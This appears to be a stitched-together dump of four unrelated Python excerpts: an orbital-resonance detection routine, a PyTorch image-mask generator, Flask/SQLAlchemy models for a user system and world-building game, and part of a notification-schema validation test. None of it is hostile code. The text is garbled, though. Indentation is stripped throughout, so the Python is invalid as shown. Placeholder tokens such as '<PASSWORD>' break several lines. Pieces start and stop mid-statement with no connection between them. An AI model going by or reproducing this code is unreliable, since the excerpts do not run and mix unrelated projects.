# Searching within 2 AUs from the resonance center
if IsIt == 0 and (ResSemiMajorAxis + 2) > np.average(SemiMajorAxis) > (ResSemiMajorAxis - 2):
phi = (float(pp[jj]) * Lambda - float(qq[jj]) * Longitude - (float(pp[jj]) - float(qq[jj])) * Pomega) % 360
AngleRange = np.arange(0, 360, 15) # Array of angles 15 degrees increment each step
Window = int(0)
Loop = 0
if typeOfData == 0:
# Dividing the timeline to 10 separate windows Detecting resonance on smaller scales
WindowStep = int(NumberOfLines / 10)
IsItArray = np.zeros(int(len(
phi) / WindowStep)) # Array of 10 binary elements to check for resonance each step '10%' set to zero
CenterArray = np.zeros(int(len(
phi) / WindowStep)) # Array of 10 binary elements to check the res angle each step '10%' set to zero
while Window + WindowStep < len(phi):
# Average of the semi-major axis from Current Window -> Next Window
WindowAverage = np.average(SemiMajorAxis[Window:Window + WindowStep])
if (ResSemiMajorAxis + 2) > WindowAverage > (
ResSemiMajorAxis - 2): # Within 2 AUs of Window Average
WindowPhi = phi[Window:Window + WindowStep] # Phi of next window
AnglePresent = np.zeros(len(AngleRange)) + 1
for step in np.arange(0, len(
AngleRange) - 1): # find out where the res angle doesn't go for 15 degrees, proxy for AnglePresent
if len(WindowPhi[
(WindowPhi > AngleRange[step]) * (WindowPhi < (AngleRange[step + 1]))]) == 0:
AnglePresent[step] = 0
IsItArray[Loop] = np.average(AnglePresent) * 180.
CenterArray[Loop] = np.average(
AnglePresent[AnglePresent != 0] * AngleRange[AnglePresent != 0])
else:
IsItArray[Loop] = 180.
Window += WindowStep # Increment Window
Loop += 1 # Increment Loop
if len(IsItArray[
IsItArray < 180.]) > 8: # If 8 out of 10 Windows classified as Resonant
IsIt = True
Amplitude = np.average(IsItArray)
Center = np.average(CenterArray)
Name = str(pp[jj]) + ':' + str(qq[jj])
MaxCenter = max(CenterArray)
MinCenter = min(CenterArray)
if (MaxCenter - MinCenter) > 210: # If the centers are too large in difference, it is not resonant
IsIt = False
Amplitude = -999
Center = -999
break
else:
Amplitude = -999
Center = -999
else:
# If checking for Kozai, we only want one window
WindowStep = int(NumberOfLines)
IsItArray = np.zeros(int(len(
omega) / WindowStep)) # For Kozai we check SMA
CenterArray = np.zeros(int(len(
omega) / WindowStep))
while Window + WindowStep < len(SemiMajorAxis):
# WindowSMA = SemiMajorAxis[Window:Window + WindowStep] # SMA of next window
AnglePresent = np.zeros(len(AngleRange)) + 1
for step in np.arange(0, len(
AngleRange) - 1): # find out where the res angle doesn't go for 15 degrees, proxy for AnglePresent
if len(omega[
(omega > AngleRange[step]) * (omega < (AngleRange[step + 1]))]) == 0:
AnglePresent[step] = 0
IsItArray[Loop] = np.average(AnglePresent) * 180.
CenterArray[Loop] = np.average(
AnglePresent[AnglePresent != 0] * AngleRange[AnglePresent != 0])
Window += WindowStep # Increment Window
Loop += 1 # Increment Loop
if len(IsItArray[
IsItArray < 180.]) == 1: # If the Window classified as Kozai
IsIt = True
Amplitude = np.average(IsItArray)
Center = np.average(CenterArray)
Name = str(pp[jj]) + ':' + str(qq[jj])
else:
Amplitude = -999
Center = -999
if typeOfData == 0: # Type 0 means we are looking if it was Resonant
IsItResonant = IsIt
ResonanceAmplitude = Amplitude
ResonanceCenter = Center
ResonanceName = Name
self.Resonant = IsItResonant
self.ResonanceAmplitude = ResonanceAmplitude
self.ResonanceCenter = ResonanceCenter
self.ResonanceType = ResonanceName
else: # Else 1 means we are looking if it was Kozai
IsItKozai = IsIt
SMAAmplitude = Amplitude
SMACenter = Center
self.Kozai = IsItKozai
self.SMAamplitude = SMAAmplitude
self.SMACenter = SMACenter
# End Else
self.Name = TestParticleSample
self.AverageEccentricity = np.average(Eccentricity)
self.AverageInclination = np.average(Inclination)
self.AverageSMA = np.average(SemiMajorAxis)
return
############################################ IDENTIFY RESONANCE ##############################################
# Expects: IndexCount
# Will do: First call to function DataDissection to check if resonant, if resonant, will do second call to check for Kozai
def IdentifyResonance(self, IndexCount):
type = 0 # Indicated that the variable Resonant is what we want from DataDissection function
self.DataDissection(type, IndexCount)
if self.Resonant == True:
type = 1 # Indicated that the variable Kozai is what we want from DataDissection function
self.DataDissection(type, IndexCount)
############################################## PRINT DATA ##############################################
# Expects: IndexCount
# Will do: Print Data Into a '.out' file Names tp + 'number you entered' + .out
def PrintData(self, IndexCount ):
TestParticleSample = sys.argv[1]
TestParticleTime, Index, SemiMajorAxis, Eccentricity, Inclination, Omega, omega, AngularPosition, Longitude = np.genfromtxt(
"tp" + TestParticleSample + ".out", unpack=True)
TextFile.write((str(self.Index) + " " +str(SemiMajorAxis[IndexCount]) + " " + str(Eccentricity[IndexCount]) + " " + str(Inclination[IndexCount]) + " " + str(Omega[IndexCount]) + " " + str(omega[IndexCount]) + " " + str(AngularPosition[IndexCount]) + " " + str(self.Name) + " " + str(self.AverageSMA) + " " + str(self.AverageEccentricity) + " " + str(self.AverageInclination) + " " + str(self.ResonanceCenter) + " " + str(self.ResonanceAmplitude) + " " + str(self.SMACenter) + " " + str(self.SMAamplitude) + " " + '\n'))
# Main function
if __name__ == '__main__':
TestParticleSample = sys.argv[1] # User to enter the number indicating the file number
Index = np.genfromtxt('tp' + TestParticleSample + ".out", usecols=1, unpack=True)
NumberOfTPs = max(Index) # Assuming there is more than one | |
<gh_stars>10-100
import numpy as np
import torch
from torch.utils.data import DataLoader, Dataset
from torchvision import datasets, transforms
class MaskGenerator():
"""Class used to generate masks. Can be used to create masks during
training or to build various masks for generation.
Parameters
----------
img_size : tuple of ints
E.g. (1, 28, 28) or (3, 64, 64)
mask_descriptor : tuple of string and other
Mask descriptors will be of the form (mask_type, mask_attribute).
Allowed descriptors are:
1. ('random', None or int or tuple of ints): Generates random masks,
where the position of visible pixels is selected uniformly
at random over the image. If mask_attribute is None then the
number of visible pixels is sampled uniformly between 1 and the
total number of pixels in the image, otherwise it is fixed to
the int given in mask_attribute. If mask_attribute is a tuple
of ints, the number of visible pixels is sampled uniformly
between the first int (lower bound) and the second int (upper
bound).
2. ('bottom', int): Generates masks where only the bottom pixels are
visible. The int determines the number of rows of the image to
keep visible at the bottom.
3. ('top', int): Generates masks where only the top pixels are
visible. The int determines the number of rows of the image to
keep visible at the top.
4. ('center', int): Generates masks where only the central pixels
are visible. The int determines the size in pixels of the sides
of the square of visible pixels of the image.
5. ('edge', int): Generates masks where only the edge pixels of the
image are visible. The int determines the thickness of the edges
in pixels.
6. ('left', int): Generates masks where only the left pixels of the
image are visible. The int determines the number of columns
in pixels which are visible.
7. ('right', int): Generates masks where only the right pixels of
the image are visible. The int determines the number of columns
in pixels which are visible.
8. ('random_rect', (int, int)): Generates random rectangular masks
where the maximum height and width of the rectangles are
determined by the two ints.
9. ('random_blob', (int, (int, int), float)): Generates random
blobs, where the number of blobs is determined by the first int,
the range of iterations (see function definition) is determined
by the tuple of ints and the threshold for making pixels visible
is determined by the float.
10. ('random_blob_cache', (str, int)): Loads pregenerated random masks
from a folder given by the string, using a batch_size given by
the int.
"""
def __init__(self, img_size, mask_descriptor):
self.img_size = img_size
self.num_pixels = img_size[1] * img_size[2]
self.mask_type, self.mask_attribute = mask_descriptor
if self.mask_type == 'random_blob_cache':
dset = datasets.ImageFolder(self.mask_attribute[0],
transform=transforms.Compose([transforms.Grayscale(),
transforms.ToTensor()]))
self.data_loader = DataLoader(dset, batch_size=self.mask_attribute[1], shuffle=True)
def get_masks(self, batch_size):
"""Returns a tensor of shape (batch_size, 1, img_size[1], img_size[2])
containing masks which were generated according to mask_type and
mask_attribute.
Parameters
----------
batch_size : int
"""
if self.mask_type == 'random':
if self.mask_attribute is None:
num_visibles = np.random.randint(1, self.num_pixels, size=batch_size)
return batch_random_mask(self.img_size, num_visibles, batch_size)
elif type(self.mask_attribute) == int:
return batch_random_mask(self.img_size, self.mask_attribute, batch_size)
else:
lower_bound, upper_bound = self.mask_attribute
num_visibles = np.random.randint(lower_bound, upper_bound, size=batch_size)
return batch_random_mask(self.img_size, num_visibles, batch_size)
elif self.mask_type == 'bottom':
return batch_bottom_mask(self.img_size, self.mask_attribute, batch_size)
elif self.mask_type == 'top':
return batch_top_mask(self.img_size, self.mask_attribute, batch_size)
elif self.mask_type == 'center':
return batch_center_mask(self.img_size, self.mask_attribute, batch_size)
elif self.mask_type == 'edge':
return batch_edge_mask(self.img_size, self.mask_attribute, batch_size)
elif self.mask_type == 'left':
return batch_left_mask(self.img_size, self.mask_attribute, batch_size)
elif self.mask_type == 'right':
return batch_right_mask(self.img_size, self.mask_attribute, batch_size)
elif self.mask_type == 'random_rect':
return batch_random_rect_mask(self.img_size, self.mask_attribute[0],
self.mask_attribute[1], batch_size)
elif self.mask_type == 'random_blob':
return batch_multi_random_blobs(self.img_size,
self.mask_attribute[0],
self.mask_attribute[1],
self.mask_attribute[2], batch_size)
elif self.mask_type == 'random_blob_cache':
# Hacky way to get a single batch of data
for mask_batch in self.data_loader:
break
# Zero index because Image folder returns (img, label) tuple
return mask_batch[0]
def single_random_mask(img_size, num_visible):
"""Returns random mask where 0 corresponds to a hidden value and 1 to a
visible value. Shape of mask is same as img_size.
Parameters
----------
img_size : tuple of ints
E.g. (1, 32, 32) for grayscale or (3, 64, 64) for RGB.
num_visible : int
Number of visible values.
"""
_, height, width = img_size
# Sample integers without replacement between 0 and the total number of
# pixels. The measurements array will then contain a pixel indices
# corresponding to locations where pixels will be visible.
measurements = np.random.choice(range(height * width), size=num_visible, replace=False)
# Create empty mask
mask = torch.zeros(1, width, height)
# Update mask with measurements
for m in measurements:
row = int(m / width)
col = m % width
mask[0, row, col] = 1
return mask
def batch_random_mask(img_size, num_visibles, batch_size, repeat=False):
"""Returns a batch of random masks.
Parameters
----------
img_size : see single_random_mask
num_visibles : int or list of ints
If int will keep the number of visible pixels in the masks fixed, if
list will change the number of visible pixels depending on the values
in the list. List should have length equal to batch_size.
batch_size : int
Number of masks to create.
repeat : bool
If True returns a batch of the same mask repeated batch_size times.
"""
# Mask should have same shape as image, but only 1 channel
mask_batch = torch.zeros(batch_size, 1, *img_size[1:])
if repeat:
if not type(num_visibles) == int:
raise RuntimeError("num_visibles must be an int if used with repeat=True. {} was provided instead.".format(type(num_visibles)))
single_mask = single_random_mask(img_size, num_visibles)
for i in range(batch_size):
mask_batch[i] = single_mask
else:
if type(num_visibles) == int:
for i in range(batch_size):
mask_batch[i] = single_random_mask(img_size, num_visibles)
else:
for i in range(batch_size):
mask_batch[i] = single_random_mask(img_size, num_visibles[i])
return mask_batch
def batch_bottom_mask(img_size, num_rows, batch_size):
"""Masks all the output except the |num_rows| lowest rows (in the height
dimension).
Parameters
----------
img_size : see single_random_mask
num_rows : int
Number of rows from bottom which will be visible.
batch_size : int
Number of masks to create.
"""
mask = torch.zeros(batch_size, 1, *img_size[1:])
mask[:, :, -num_rows:, :] = 1.
return mask
def batch_top_mask(img_size, num_rows, batch_size):
"""Masks all the output except the |num_rows| highest rows (in the height
dimension).
Parameters
----------
img_size : see single_random_mask
num_rows : int
Number of rows from top which will be visible.
batch_size : int
Number of masks to create.
"""
mask = torch.zeros(batch_size, 1, *img_size[1:])
mask[:, :, :num_rows, :] = 1.
return mask
def batch_center_mask(img_size, num_pixels, batch_size):
"""Masks all the output except the num_pixels by num_pixels central square
of the image.
Parameters
----------
img_size : see single_random_mask
num_pixels : int
Should be even. If not even, num_pixels will be replaced with
num_pixels - 1.
batch_size : int
Number of masks to create.
"""
mask = torch.zeros(batch_size, 1, *img_size[1:])
_, height, width = img_size
lower_height = int(height / 2 - num_pixels / 2)
upper_height = int(height / 2 + num_pixels / 2)
lower_width = int(width / 2 - num_pixels / 2)
upper_width = int(width / 2 + num_pixels / 2)
mask[:, :, lower_height:upper_height, lower_width:upper_width] = 1.
return mask
def batch_edge_mask(img_size, num_pixels, batch_size):
"""Masks all the output except the num_pixels thick edge of the image.
Parameters
----------
img_size : see single_random_mask
num_pixels : int
Should be smaller than min(height / 2, width / 2).
batch_size : int
Number of masks to create.
"""
mask = torch.zeros(batch_size, 1, *img_size[1:])
mask[:, :, :num_pixels, :] = 1.
mask[:, :, -num_pixels:, :] = 1.
mask[:, :, :, :num_pixels] = 1.
mask[:, :, :, -num_pixels:] = 1.
return mask
def batch_left_mask(img_size, num_cols, batch_size):
"""Masks all the pixels except the left side of the image.
Parameters
----------
img_size : see single_random_mask
num_cols : int
Number of columns of the left side of the image to remain visible.
batch_size : int
Number of masks to create.
"""
mask = torch.zeros(batch_size, 1, *img_size[1:])
mask[:, :, :, :num_cols] = 1.
return mask
def batch_right_mask(img_size, num_cols, batch_size):
"""Masks all the pixels except the right side of the image.
Parameters
----------
img_size : see single_random_mask
num_cols : int
Number of columns of the right side of the image to remain visible.
batch_size : | |
from datetime import datetime
import hashlib
from werkzeug.security import generate_password_hash, check_password_hash
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from markdown import markdown
import bleach
from flask import current_app, request
from flask.ext.login import UserMixin, AnonymousUserMixin
from . import db, login_manager
from random import randint
class Permission:
FOLLOW = 0x01
COMMENT = 0x02
WRITE_ARTICLES = 0x04
MODERATE_COMMENTS = 0x08
ADMINISTER = 0x80
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
default = db.Column(db.Boolean, default=False, index=True)
permissions = db.Column(db.Integer)
users = db.relationship('User', backref='role', lazy='dynamic')
@staticmethod
def insert_roles():
roles = {
'User': (Permission.FOLLOW |
Permission.COMMENT |
Permission.WRITE_ARTICLES, True),
'Moderator': (Permission.FOLLOW |
Permission.COMMENT |
Permission.WRITE_ARTICLES |
Permission.MODERATE_COMMENTS, False),
'Administrator': (0xff, False)
}
for r in roles:
role = Role.query.filter_by(name=r).first()
if role is None:
role = Role(name=r)
role.permissions = roles[r][0]
role.default = roles[r][1]
db.session.add(role)
db.session.commit()
def __repr__(self):
return '<Role %r>' % self.name
player_world_table = db.Table('player_worlds', db.Model.metadata,
db.Column('player_id', db.Integer,
db.ForeignKey('users.id')),
db.Column('world_id', db.Integer,
db.ForeignKey('world.id')))
class User(UserMixin, db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.String(64), unique=True, index=True)
username = db.Column(db.String(64), unique=True, index=True)
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
password_hash = db.Column(db.String(128))
confirmed = db.Column(db.Boolean, default=False)
name = db.Column(db.String(64))
location = db.Column(db.String(64))
about_me = db.Column(db.Text())
member_since = db.Column(db.DateTime(), default=datetime.utcnow)
last_seen = db.Column(db.DateTime(), default=datetime.utcnow)
avatar_hash = db.Column(db.String(32))
posts = db.relationship('Post', backref='author', lazy='dynamic')
armies = db.relationship('Armies', backref='army_owner', lazy='dynamic')
turnlog = db.relationship('TurnLog', backref='player_turn', lazy='dynamic')
events = db.relationship('Events', backref='player_event', lazy='dynamic')
races = db.relationship('Race', backref='race_creator', lazy='dynamic')
avatars = db.relationship('Avatars', backref='avatar_owner', lazy='dynamic')
orders = db.relationship('Orders', backref='order_owner', lazy='dynamic')
owned_worlds = db.relationship('World', backref='world_owner', lazy='dynamic')
worlds = db.relationship('World',
secondary=player_world_table,
backref =db.backref('players', lazy='dynamic'),
lazy='dynamic')
points = db.relationship('PowerPoints', backref='player_points',lazy='dynamic')
@staticmethod
def generate_fake(count=100):
from sqlalchemy.exc import IntegrityError
from random import seed
import forgery_py
seed()
for i in range(count):
u = User(email=forgery_py.internet.email_address(),
username=forgery_py.internet.user_name(True),
password=<PASSWORD>(),
confirmed=True,
name=forgery_py.name.full_name(),
location=forgery_py.address.city(),
about_me=forgery_py.lorem_ipsum.sentence(),
member_since=forgery_py.date.date(True))
db.session.add(u)
try:
db.session.commit()
except IntegrityError:
db.session.rollback()
def __init__(self, **kwargs):
super(User, self).__init__(**kwargs)
if self.role is None:
if self.email == current_app.config['FLASKY_ADMIN']:
self.role = Role.query.filter_by(permissions=0xff).first()
if self.role is None:
self.role = Role.query.filter_by(default=True).first()
if self.email is not None and self.avatar_hash is None:
self.avatar_hash = hashlib.md5(
self.email.encode('utf-8')).hexdigest()
@property
def password(self):
raise AttributeError('password is not a readable attribute')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
def generate_confirmation_token(self, expiration=3600):
s = Serializer(current_app.config['SECRET_KEY'], expiration)
return s.dumps({'confirm': self.id})
def confirm(self, token):
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except:
return False
if data.get('confirm') != self.id:
return False
self.confirmed = True
db.session.add(self)
return True
def generate_reset_token(self, expiration=3600):
s = Serializer(current_app.config['SECRET_KEY'], expiration)
return s.dumps({'reset': self.id})
def reset_password(self, token, new_password):
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except:
return False
if data.get('reset') != self.id:
return False
self.password = <PASSWORD>
db.session.add(self)
return True
def generate_email_change_token(self, new_email, expiration=3600):
s = Serializer(current_app.config['SECRET_KEY'], expiration)
return s.dumps({'change_email': self.id, 'new_email': new_email})
def change_email(self, token):
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except:
return False
if data.get('change_email') != self.id:
return False
new_email = data.get('new_email')
if new_email is None:
return False
if self.query.filter_by(email=new_email).first() is not None:
return False
self.email = new_email
self.avatar_hash = hashlib.md5(
self.email.encode('utf-8')).hexdigest()
db.session.add(self)
return True
def can(self, permissions):
return self.role is not None and \
(self.role.permissions & permissions) == permissions
def is_administrator(self):
return self.can(Permission.ADMINISTER)
def ping(self):
self.last_seen = datetime.utcnow()
db.session.add(self)
def gravatar(self, size=100, default='identicon', rating='g'):
if request.is_secure:
url = 'https://secure.gravatar.com/avatar'
else:
url = 'http://www.gravatar.com/avatar'
hash = self.avatar_hash or hashlib.md5(
self.email.encode('utf-8')).hexdigest()
return '{url}/{hash}?s={size}&d={default}&r={rating}'.format(
url=url, hash=hash, size=size, default=default, rating=rating)
def __repr__(self):
return '<User %r>' % self.username
def get_id(self):
return self.id
def return_points_obj(self,world_id):
points = self.points.filter_by(world=world_id).first()
try:
points.points >= 0
except:
points = PowerPoints()
points.points = 0
return points
def is_anon(self):
return False
class AnonymousUser(AnonymousUserMixin):
def can(self, permissions):
return False
def is_administrator(self):
return False
def return_points_obj(self,world_id):
points = PowerPoints()
points.points = -1
return points
def is_anon(self):
return True
login_manager.anonymous_user = AnonymousUser
@login_manager.user_loader
def load_user(user_id):
return User.query.get(user_id)
class Post(db.Model):
__tablename__ = 'posts'
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.Text)
body_html = db.Column(db.Text)
timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
author_id = db.Column(db.Integer, db.ForeignKey('users.id'))
@staticmethod
def generate_fake(count=100):
from random import seed, randint
import forgery_py
seed()
user_count = User.query.count()
for i in range(count):
u = User.query.offset(randint(0, user_count - 1)).first()
p = Post(body=forgery_py.lorem_ipsum.sentences(randint(1, 5)),
timestamp=forgery_py.date.date(True),
author=u)
db.session.add(p)
db.session.commit()
@staticmethod
def on_changed_body(target, value, oldvalue, initiator):
allowed_tags = ['a', 'abbr', 'acronym', 'b', 'blockquote', 'code',
'em', 'i', 'li', 'ol', 'pre', 'strong', 'ul',
'h1', 'h2', 'h3', 'p']
target.body_html = bleach.linkify(bleach.clean(
markdown(value, output_format='html'),
tags=allowed_tags, strip=True))
db.event.listen(Post.body, 'set', Post.on_changed_body)
from app import db
from hashlib import md5
from flask import url_for
order_location_table = db.Table('order_location', db.Model.metadata,
db.Column('order_id', db.Integer,
db.ForeignKey('orders.id')),
db.Column('location_id', db.Integer,
db.ForeignKey('worldmap.id')))
class OrderTypes(db.Model):
id = db.Column(db.Integer, primary_key = True)
text = db.Column(db.String(64))
def insert_orders():
orders = ('Cultural Religion', 'Religious', "Military","Trade","Criminal","Technology","Magic")
for o in orders:
order = OrderTypes.query.filter_by(text=o).first()
if order is None:
order = OrderTypes(text=o)
db.session.add(order)
db.session.commit()
class WorldMap(db.Model):
__tablename__ = 'worldmap'
id = db.Column(db.Integer, primary_key=True)
world = db.Column(db.Integer, db.ForeignKey('world.id'))
race = db.Column(db.Integer,db.ForeignKey('race.id'),default=0)
race_color = db.Column(db.Integer,default=0)
letter_coord = db.Column(db.Integer)
number_coord = db.Column(db.Integer)
terrain = db.Column(db.String(16))
image = db.Column(db.String(16))
city = db.relationship("City",backref='world_location',lazy='dynamic')
has_city = db.Column(db.Integer)
army = db.relationship("Armies",backref='worldmap_id',lazy='dynamic')
events = db.relationship("Events",backref="worldmap_event_id",lazy='dynamic')
prov_bldg = db.relationship("BldgProv",backref="worldmap",lazy='dynamic')
avatars = db.relationship("Avatars",backref="worldmap_avatar",lazy='dynamic')
def coords(self):
return str(self.letter_coord)+"x/"+str(self.number_coord)+"y"
def regen_coords(self):
return {"y":self.number_coord,"x":int(self.letter_coord),}
def return_image(self):
return url_for('static',filename="image/"+self.image)
def return_race(self):
return Race.query.get(self.race)
def return_live_city(self):
return self.city.filter_by(is_alive=1).first()
def return_live_provbldge(self):
return self.prov_bldg.filter_by(is_alive=1).all()
def return_ruin_city(self):
return self.city.filter_by(is_alive=0).all()
def return_ruin_provbldg(self):
return self.prov_bldg.filter_by(is_alive=0).all()
class World(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64),index=True,unique=True)
age = db.Column(db.Integer ,index=True, default=1)
turn_of_age = db.Column(db.Integer, index=True,default=1)
total_turns = db.Column(db.Integer, index=True,default=1)
races = db.relationship('Race', backref='homeworld', lazy='dynamic')
active = db.Column(db.Integer,default=0)
cities = db.relationship('City', backref='city_homeworld', lazy='dynamic')
avatars = db.relationship("Avatars", backref='avatar_homeworld', lazy='dynamic')
turnlog = db.relationship("TurnLog", backref='turnlog_homeworld', lazy='dynamic')
event = db.relationship("Events", backref='event_homeworld', lazy='dynamic')
orders = db.relationship("Orders", backref='order_homeworld', lazy='dynamic')
provbldg = db.relationship("BldgProv", backref="world",lazy='dynamic')
armies = db.relationship("Armies", backref="worldid",lazy='dynamic')
history = db.relationship("WorldHistory",backref="worldbackref",lazy='dynamic')
points = db.relationship('PowerPoints', backref='world_points',lazy='dynamic')
size = db.Column(db.Integer,default=50)
owner = db.Column(db.Integer, db.ForeignKey('users.id'))
def __repr__(self):
return '<World %r>' % (self.name)
def age_turn(self):
return "A"+str(self.age)+":T"+str(self.turn_of_age)
def ret_history(self):
return WorldHistory.query.filter_by(world=self.id).order_by(WorldHistory.id.desc())
def delete_self(self):
for each in self.provbldg.all():
db.session.delete(each)
for each in self.armies.all():
db.session.delete(each)
for each in self.history.all():
db.session.delete(each)
for each in self.points.all():
db.session.delete(each)
for each in self.avatars.all():
db.session.delete(each)
for each in self.event.all():
db.session.delete(each)
for each in self.orders.all():
for location in each.locations.all():
db.session.delete(location)
db.session.delete(each)
for each in Race.query.filter_by(world_id=self.id).all():
each.remove_stuff()
db.session.delete(each)
for each in self.cities:
each.remove_stuff()
db.session.delete(each)
for each in WorldMap.query.filter_by(world=self.id).all():
db.session.delete(each)
db.session.commit()
class Race(db.Model):
id = db.Column(db.Integer, primary_key = True)
world_id = db.Column(db.Integer, db.ForeignKey('world.id'))
#Check culture_name when calling to make certain unique per world
culture_name = db.Column(db.String(128),index=True)
race_name = db.Column(db.String(64))
map_color = db.Column(db.Integer)
alignment = db.Column(db.Integer)
creator = db.Column(db.Integer, db.ForeignKey('users.id'))
abs_turn_made = db.Column(db.Integer)
age_turn = db.Column(db.String(64))
#subrace - 0 or race_id
subrace = db.Column(db.Integer, default=0)
controlled_cities = db.relationship('City', backref='city_builders', lazy='dynamic')
controlled_provbldg = db.relationship('BldgProv', backref='bldgprov_builders', lazy='dynamic')
armies = db.relationship('Armies', backref='culture', lazy='dynamic')
orders = db.relationship("Orders", backref='founders',lazy='dynamic')
religion = db.Column(db.Integer)
location = db.relationship("WorldMap",backref='race_location',lazy='dynamic')
advances = db.relationship("RaceAdvances",backref="race_obj",lazy='dynamic')
def remove_stuff(self):
#part of deleting a world
for each in self.advances.all():
db.session.delete(each)
for each in self.location.all():
db.session.delete(each)
for each in self.armies.all():
db.session.delete(each)
db.session.commit()
def subrace_of(self):
if self.subrace == 0:
return "None"
else:
parent_id = self.subrace
parent = Race.query.get(parent_id)
return parent.culture_name
def made_by(self):
if self.creator == 0 or self.creator == None:
return "Orphaned"
else:
creator = User.query.get(self.creator)
return creator.name
def get_religion(self):
if self.religion == 0:
return None
elif self.religion == None:
return None
else:
religion = Orders.query.get(self.religion)
return religion
class City(db.Model):
id = db.Column(db.Integer, primary_key = True)
world_id = db.Column(db.Integer, db.ForeignKey('world.id'))
name = db.Column(db.String(64))
#Building Race's ID
built_by = db.Column(db.Integer)
owned_by = db.Column(db.Integer, db.ForeignKey('race.id'))
location = db.Column(db.Integer, db.ForeignKey('worldmap.id'))
alignment = db.Column(db.Integer)
buildings = db.relationship("BldgCity", backref="bldg_here", lazy='dynamic')
armies = db.relationship("Armies", backref='army_built_here', lazy='dynamic')
age_turn = db.Column(db.String(64))
turn_built = db.Column(db.Integer)
is_alive = db.Column(db.Integer, default = 1)
destroyed_in = db.Column(db.Integer)
history = db.relationship("CityHistory",backref="history",lazy='dynamic')
orders = db.relationship("Order_City",backref="order_city_cityobj",lazy='dynamic')
advances = db.relationship("CityAdvances",backref="city_obj",lazy='dynamic')
def remove_stuff(self):
for each in self.buildings.all():
db.session.delete(each)
for each in self.history.all():
db.session.delete(each)
for each in self.advances.all():
db.session.delete(each)
def builder_name(self):
builder = Race.query.get(self.built_by)
return builder.culture_name
def owner_name(self):
if self.is_alive:
owner = Race.query.get(self.owned_by)
return owner.culture_name
else:
return "Ruins"
def ret_history(self):
return CityHistory.query.filter_by(cityid=self.id).order_by(CityHistory.id.desc())
def return_location(self):
return WorldMap.query.get(self.location)
def return_owner_player(self):
race = Race.query.get(self.owned_by)
player = User.query.get(race.creator)
return player.id
class BldgCity(db.Model):
id = db.Column(db.Integer, primary_key = True)
name = db.Column(db.String(64))
desc = db.Column(db.String(64))
built_in = db.Column(db.Integer, db.ForeignKey('city.id'))
age_turn = db.Column(db.String(64))
turn_built = db.Column(db.Integer)
class | |
Entries:
valid_schema_keys = (
'name', 'private', 'required', 'type', 'values', 'min', 'max',
'regex', 'default', 'list', 'delim', 'prefix', 'map_to', 'alias_of',
)
for entry in details['schemas']:
# Track the map_to entries (if specified); We need to make sure that
# these properly map back
map_to_entries = set()
# Track the alias_of entries
map_to_aliases = set()
# A Service Name MUST be defined
assert 'service_name' in entry
assert isinstance(entry['service_name'], six.string_types)
# Acquire our protocols
protocols = parse_list(
entry['protocols'], entry['secure_protocols'])
# At least one schema/protocol MUST be defined
assert len(protocols) > 0
# our details
assert 'details' in entry
assert isinstance(entry['details'], dict)
# All schema details should include args
for section in ['kwargs', 'args', 'tokens']:
assert section in entry['details']
assert isinstance(entry['details'][section], dict)
for key, arg in entry['details'][section].items():
# Validate keys (case-sensitive)
assert len([k for k in arg.keys()
if k not in valid_schema_keys]) == 0
# Test our argument
assert isinstance(arg, dict)
if 'alias_of' not in arg:
# Minimum requirement of an argument
assert 'name' in arg
assert isinstance(arg['name'], six.string_types)
assert 'type' in arg
assert isinstance(arg['type'], six.string_types)
assert is_valid_type_re.match(arg['type']) is not None
if 'min' in arg:
assert arg['type'].endswith('float') \
or arg['type'].endswith('int')
assert isinstance(arg['min'], (int, float))
if 'max' in arg:
# If a min and max was specified, at least check
# to confirm the min is less then the max
assert arg['min'] < arg['max']
if 'max' in arg:
assert arg['type'].endswith('float') \
or arg['type'].endswith('int')
assert isinstance(arg['max'], (int, float))
if 'private' in arg:
assert isinstance(arg['private'], bool)
if 'required' in arg:
assert isinstance(arg['required'], bool)
if 'prefix' in arg:
assert isinstance(arg['prefix'], six.string_types)
if section == 'kwargs':
# The only acceptable prefix types for kwargs
assert arg['prefix'] in (':', '+', '-')
else:
# kwargs requires that the 'prefix' is defined
assert section != 'kwargs'
if 'map_to' in arg:
# must be a string
assert isinstance(arg['map_to'], six.string_types)
# Track our map_to object
map_to_entries.add(arg['map_to'])
else:
map_to_entries.add(key)
# Some verification
if arg['type'].startswith('choice'):
# choice:bool is redundant and should be swapped to
# just bool
assert not arg['type'].endswith('bool')
# Choices require that a values list is provided
assert 'values' in arg
assert isinstance(arg['values'], (list, tuple))
assert len(arg['values']) > 0
# Test default
if 'default' in arg:
# if a default is provided on a choice object,
# it better be in the list of values
assert arg['default'] in arg['values']
if arg['type'].startswith('bool'):
# Boolean choices are less restrictive but require a
# default value
assert 'default' in arg
assert isinstance(arg['default'], bool)
if 'regex' in arg:
# Regex must ALWAYS be in the format (regex, option)
assert isinstance(arg['regex'], (tuple, list))
assert len(arg['regex']) == 2
assert isinstance(arg['regex'][0], six.string_types)
assert arg['regex'][1] is None or isinstance(
arg['regex'][1], six.string_types)
# Compile the regular expression to verify that it is
# valid
try:
re.compile(arg['regex'][0])
except:
assert '{} is an invalid regex'\
.format(arg['regex'][0])
# Regex should always start and/or end with ^/$
assert re.match(
r'^\^.+?$', arg['regex'][0]) is not None
assert re.match(
r'^.+?\$$', arg['regex'][0]) is not None
if arg['type'].startswith('list'):
# Delimiters MUST be defined
assert 'delim' in arg
assert isinstance(arg['delim'], (list, tuple))
assert len(arg['delim']) > 0
else: # alias_of is in the object
# Ensure we're not already in the tokens section
# The alias_of object has no value here
assert section != 'tokens'
# must be a string
assert isinstance(
arg['alias_of'], (six.string_types, list, tuple, set))
aliases = [arg['alias_of']] \
if isinstance(arg['alias_of'], six.string_types) \
else arg['alias_of']
for alias_of in aliases:
# Track our alias_of object
map_to_aliases.add(alias_of)
# We can't be an alias_of ourselves
if key == alias_of:
